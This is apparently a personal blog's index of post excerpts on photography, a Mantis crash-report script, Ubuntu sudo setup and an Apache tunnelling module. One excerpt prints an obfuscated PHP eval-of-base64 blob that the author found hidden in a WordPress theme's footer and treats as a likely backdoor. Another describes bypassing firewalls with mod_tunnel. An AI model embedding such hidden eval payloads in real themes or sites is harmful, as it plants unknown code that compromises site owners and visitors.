After having used and abused Big Huge Labs’ On Black Flickr tool, I finally decided to start my very own Dark Room. It’ll be my personal black & white photo gallery, a portfolio of sorts.
Backdoor in WordPress themes?
I was looking for a theme to use in a WordPress blog and I stumbled on this one. Cool, I thought, I might use it… but… hey… why there’s this weird stuff in footer.php? 12345678<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0 NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc 5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/ b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5 p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa hOh0EIT7b8A'))); ?> Uhm… it looks very suspicious. Too suspicious. Let’s change eval with …
FeedbackReporter and Mantis integration
I’ve just written a small script to store reports generated by FeedbackReporter on a Mantis system. It should come handy to keep track of your application crashes (crash? uh? My apps never crash! :-)) You can download it here. Simply extract it on your webserver and edit config.php to adjust your settings. It can work …
Perplexed about Ubuntu’s sudoers configuration
Recently I’ve been administering my first Ubuntu machine and I already feel a bit perplexed about its security setup. The issue is that by default, the root account password is locked in Ubuntu and you are encouraged never to use root, but rely on sudoers for system administration. I’ve read the rationale on Ubuntu’s wiki …
mod_tunnel for Apache 2.2.x
mod_tunnel is a simple Apache module that can be used to create TCP tunnels using your Web server. It is useful to expose services which can be reached through a proxy, bypassing firewalls. After only 4 years since the previous version, you can now download version 2.0 which works with Apache 2.2.x (and maybe 2.0.x, …